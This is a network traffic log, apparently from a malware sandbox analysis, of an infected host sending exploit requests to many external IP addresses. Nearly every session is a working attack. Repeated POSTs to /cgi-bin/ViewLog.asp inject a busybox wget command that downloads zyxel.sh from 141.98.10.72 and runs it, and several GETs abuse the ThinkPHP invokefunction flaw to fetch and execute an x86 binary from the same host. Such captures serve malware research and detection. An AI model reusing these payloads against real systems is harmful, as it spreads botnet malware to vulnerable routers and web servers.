                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            653192.168.2.234912094.61.165.1148080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:26.789537907 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            654192.168.2.234704894.123.0.2088080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:26.809801102 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            655192.168.2.234846894.253.43.2498080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:26.810018063 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:27.082885981 CET21INHTTP/1.1
                                                            Data Raw:
                                                            Data Ascii:


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            656192.168.2.233634494.122.223.2528080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:26.810159922 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            657192.168.2.235463694.121.177.1788080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:26.811755896 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            658192.168.2.234814631.200.0.538080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:27.055675983 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            659192.168.2.235962694.123.151.2428080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:27.057137012 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            660192.168.2.235175295.86.125.2148080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:27.064191103 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            661192.168.2.235514295.86.79.218080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:27.276614904 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            662192.168.2.2346040112.155.109.1080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:27.796858072 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:28.107090950 CET339INHTTP/1.0 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 17:33:36 GMT
                                                            Server: Boa/0.94.14rc21
                                                            Accept-Ranges: bytes
                                                            Connection: close
                                                            Content-Type: text/html; charset=ISO-8859-1
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            663192.168.2.234609685.156.111.528080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:27.797077894 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:28.020318031 CET561INHTTP/1.1 404 Not Found
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Headers: Content-Type
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Date: Wed, 14 Feb 2024 08:29:28 GMT
                                                            Server: WebServer
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            664192.168.2.2353038112.74.188.11080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:27.833050013 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:28.179845095 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:29:28 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            665192.168.2.233346831.200.54.2558080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:28.042561054 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            666192.168.2.233473631.200.108.538080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:28.042644978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            667192.168.2.233538294.123.244.318080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:28.043097019 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            668192.168.2.233599862.29.121.1098080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:28.044655085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            669192.168.2.233669862.29.64.1928080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:28.044787884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            670192.168.2.235961662.29.89.1208080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:28.046192884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            671192.168.2.2339216112.178.184.12980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:28.079169989 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:28.362725973 CET35INHTTP/1.0 301 Redirect
                                                            Feb 14, 2024 09:29:28.364204884 CET377INData Raw: 44 61 74 65 3a 20 57 65 64 20 46 65 62 20 31 34 20 31 37 3a 32 39 3a 32 37 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74
                                                            Data Ascii: Date: Wed Feb 14 17:29:27 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: (null)Location: http://127.0.0.1:8899/login.asp<html><head></head><body>This document has moved to a new <a href="http://


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            672192.168.2.234440894.240.114.878080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:28.227243900 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            673192.168.2.2345696112.186.102.15380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:28.355783939 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:29.814834118 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:31.510536909 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:34.902089119 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:41.813307047 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:55.379215002 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:23.535552025 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            674192.168.2.234121295.101.249.17280
                                                            TimestampBytes transferredDirectionData
